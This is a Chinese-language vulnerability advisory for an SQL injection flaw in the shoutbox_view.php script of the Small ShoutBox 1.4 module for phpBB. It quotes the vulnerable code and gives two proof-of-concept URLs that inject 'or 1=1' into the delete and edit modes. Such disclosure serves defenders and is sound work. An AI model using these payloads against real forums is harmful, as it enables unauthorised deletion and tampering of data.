phpBB Small ShoutBox模块shoutbox_view.php脚本SQL注入漏洞
发布日期:2008-11-13
更新日期:2008-11-14
受影响系统:Przemo Small ShoutBox 1.4
描述:
BUGTRAQ ID:
32287
Small ShoutBox模块是phpBB论坛中所使用的一个留言板模块。
如果mode设置为delete的话,Small ShoutBox模块的shoutbox_view.php文件没有正确地过滤对id参数的输入便用在了SQL查询中:
File (shoutbox_view.php)
50. $id = ( isset($HTTP_GET_VARS['id']) ) ? $HTTP_GET_VARS['id'] : $HTTP_POST_VARS['id'];
168. if ( $mode == "delete" && $adel )
169. {
170. $sql = "DELETE FROM " . SHOUTBOX_TABLE . "
171. WHERE id = $id $del_mod";
172. if( !($result = $db->sql_query($sql)) )
173. { message_die(GENERAL_ERROR, 'Could not delete shoutbox message', '', __LINE__, __FILE__, $sql); }
174.
这允许远程攻击者通过向论坛提交恶意请求执行SQL注入攻击。
<*来源:StAkeR (
StAkeR@hotmail.it)
链接:
http://secunia.com/advisories/32565/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/shoutbox_view.php?mode=delete&id=-1 or 1=1/*
http://www.example.com/shoutbox_view.php?mode=edit&id=-1 or 1=1/*&name_id=1 or 1=1/*&date_edit=1225915829&name_edit=[NICKNAME]&clean_msg=[MESSAGE]
建议:
厂商补丁:
Przemo
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.przemo.org/phpBB2/index.php?page=list浏览次数:3547
严重程度:0(网友投票)
